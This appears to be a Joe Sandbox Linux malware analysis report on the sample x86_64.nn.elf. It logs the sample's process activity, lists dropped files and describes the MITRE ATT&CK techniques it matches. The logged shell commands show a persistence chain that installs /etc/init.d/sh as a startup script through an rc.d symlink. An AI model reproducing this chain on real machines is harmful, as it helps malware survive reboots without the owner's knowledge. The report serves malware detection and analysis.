Start date (UTC):	24/12/2024
Path:	/tmp/x86_64.nn.elf
Arguments:	-
File size:	80064 bytes
MD5 hash:	3c2e0d786a9ca6565062a422428fe948

Start time (UTC):	04:57:52
Start date (UTC):	24/12/2024
Path:	/bin/sh
Arguments:	sh -c "chmod +x /etc/init.d/sh >/dev/null 2>&1"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	04:57:52
Start date (UTC):	24/12/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	04:57:52
Start date (UTC):	24/12/2024
Path:	/usr/bin/chmod
Arguments:	chmod +x /etc/init.d/sh
File size:	63864 bytes
MD5 hash:	739483b900c045ae1374d6f53a86a279

Start time (UTC):	04:57:52
Start date (UTC):	24/12/2024
Path:	/tmp/x86_64.nn.elf
Arguments:	-
File size:	80064 bytes
MD5 hash:	3c2e0d786a9ca6565062a422428fe948

Start time (UTC):	04:57:52
Start date (UTC):	24/12/2024
Path:	/bin/sh
Arguments:	sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	04:57:52
Start date (UTC):	24/12/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	04:57:52
Start date (UTC):	24/12/2024
Path:	/usr/bin/mkdir
Arguments:	mkdir -p /etc/rc.d
File size:	88408 bytes
MD5 hash:	088c9d1df5a28ed16c726eca15964cb7

Start time (UTC):	04:57:52
Start date (UTC):	24/12/2024
Path:	/tmp/x86_64.nn.elf
Arguments:	-
File size:	80064 bytes
MD5 hash:	3c2e0d786a9ca6565062a422428fe948

Start time (UTC):	04:57:52
Start date (UTC):	24/12/2024
Path:	/bin/sh
Arguments:	sh -c "ln -s /etc/init.d/sh /etc/rc.d/S99sh >/dev/null 2>&1"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	04:57:52
Start date (UTC):	24/12/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	04:57:52
Start date (UTC):	24/12/2024
Path:	/usr/bin/ln
Arguments:	ln -s /etc/init.d/sh /etc/rc.d/S99sh
File size:	76160 bytes
MD5 hash:	e933cf05571f62c0157d4e2dfcaea282

Start time (UTC):	04:57:52
Start date (UTC):	24/12/2024
Path:	/tmp/x86_64.nn.elf
Arguments:	-
File size:	80064 bytes
MD5 hash:	3c2e0d786a9ca6565062a422428fe948

Start time (UTC):	04:57:52
Start date (UTC):	24/12/2024
Path:	/tmp/x86_64.nn.elf
Arguments:	-
File size:	80064 bytes
MD5 hash:	3c2e0d786a9ca6565062a422428fe948

Start time (UTC):	04:57:52
Start date (UTC):	24/12/2024
Path:	/tmp/x86_64.nn.elf
Arguments:	-
File size:	80064 bytes
MD5 hash:	3c2e0d786a9ca6565062a422428fe948

Start time (UTC):	04:57:52
Start date (UTC):	24/12/2024
Path:	/usr/lib/udisks2/udisksd
Arguments:	-
File size:	483056 bytes
MD5 hash:	1d7ae439cc3d82fa6b127671ce037a24

Start time (UTC):	04:57:52
Start date (UTC):	24/12/2024
Path:	/usr/sbin/dumpe2fs
Arguments:	dumpe2fs -h /dev/dm-0
File size:	31112 bytes
MD5 hash:	5c66f7d8f7681a40562cf049ad4b72b4

Start time (UTC):	04:57:52
Start date (UTC):	24/12/2024
Path:	/usr/lib/systemd/systemd
Arguments:	-
File size:	1620224 bytes
MD5 hash:	9b2bec7092a40488108543f9334aab75

Start time (UTC):	04:57:52
Start date (UTC):	24/12/2024
Path:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
Arguments:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
File size:	22760 bytes
MD5 hash:	3633b075f40283ec938a2a6a89671b0e

Start time (UTC):	04:57:52
Start date (UTC):	24/12/2024
Path:	/usr/lib/udisks2/udisksd
Arguments:	-
File size:	483056 bytes
MD5 hash:	1d7ae439cc3d82fa6b127671ce037a24

Start time (UTC):	04:57:52
Start date (UTC):	24/12/2024
Path:	/usr/sbin/dumpe2fs
Arguments:	dumpe2fs -h /dev/dm-0
File size:	31112 bytes
MD5 hash:	5c66f7d8f7681a40562cf049ad4b72b4

Start time (UTC):	04:57:52
Start date (UTC):	24/12/2024
Path:	/usr/lib/udisks2/udisksd
Arguments:	-
File size:	483056 bytes
MD5 hash:	1d7ae439cc3d82fa6b127671ce037a24

Start time (UTC):	04:57:52
Start date (UTC):	24/12/2024
Path:	/usr/sbin/dumpe2fs
Arguments:	dumpe2fs -h /dev/dm-0
File size:	31112 bytes
MD5 hash:	5c66f7d8f7681a40562cf049ad4b72b4

Start time (UTC):	04:57:52
Start date (UTC):	24/12/2024
Path:	/usr/lib/udisks2/udisksd
Arguments:	-
File size:	483056 bytes
MD5 hash:	1d7ae439cc3d82fa6b127671ce037a24

Start time (UTC):	04:57:52
Start date (UTC):	24/12/2024
Path:	/usr/sbin/dumpe2fs
Arguments:	dumpe2fs -h /dev/dm-0
File size:	31112 bytes
MD5 hash:	5c66f7d8f7681a40562cf049ad4b72b4

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may establish persistence through executing malicious commands triggered by a user’s shell. User Unix Shell s execute several configuration scripts at different points throughout the session based on events. For example, when a user opens a command-line interface or remotely logs in (such as via SSH) a login shell is initiated. The login shell executes scripts from the system ( `/etc` ) and the user’s home directory ( `~/` ) to configure the environment. All login shells on a system use /etc/profile when initiated. These configuration scripts run at the permission level of their directory and are often used to set environment variables, create aliases, and customize the user’s environment. When the shell exits or terminates, additional shell scripts are executed to ensure the shell exits appropriately.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Creation, File: File Modification, Process: Process Creation
Platforms:	Linux, macOS
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify systemd services to repeatedly execute malicious payloads as part of persistence. Systemd is a system and service manager commonly used for managing background daemon processes (also known as services) and other system resources.Systemd is the default initialization (init) system on many Linux distributions replacing legacy init systems, including SysVinit and Upstart, while remaining backwards compatible.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Creation, File: File Modification, Process: Process Creation, Service: Service Creation, Service: Service Modification
Platforms:	Linux
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.).
Tactics:	Defense Evasion
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may insert, delete, or manipulate data in order to influence external outcomes or hide activity, thus threatening the integrity of the data. By manipulating data, adversaries may attempt to affect a business process, organizational understanding, or decision making.
Tactics:	Impact
Data Sources:	File: File Creation, File: File Deletion, File: File Metadata, File: File Modification, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Linux Analysis Report x86_64.nn.elf

Overview

General Information

Detection

Signatures

Classification

General Information

Warnings

Runtime Messages

Process Tree

Yara Signatures

Initial Sample

Memory Dumps

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Spreading

Networking

System Summary

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Malware Configuration

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

/boot/bootcmd

/etc/init.d/sh

/etc/init.d/system

/etc/inittab

/etc/motd

/etc/profile

/etc/rc.local

/etc/systemd/system/custom.service

/memfd:snapd-env-generator (deleted)

Static File Info

General

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

System Behavior

Analysis Process: x86_64.nn.elf PID: 5528, Parent PID: 5452

General

Chronological Activities

Analysis Process: x86_64.nn.elf PID: 5541, Parent PID: 5528

General

Chronological Activities

Analysis Process: sh PID: 5541, Parent PID: 5528

General

Chronological Activities

Analysis Process: sh PID: 5550, Parent PID: 5541

Linux Analysis Report
x86_64.nn.elf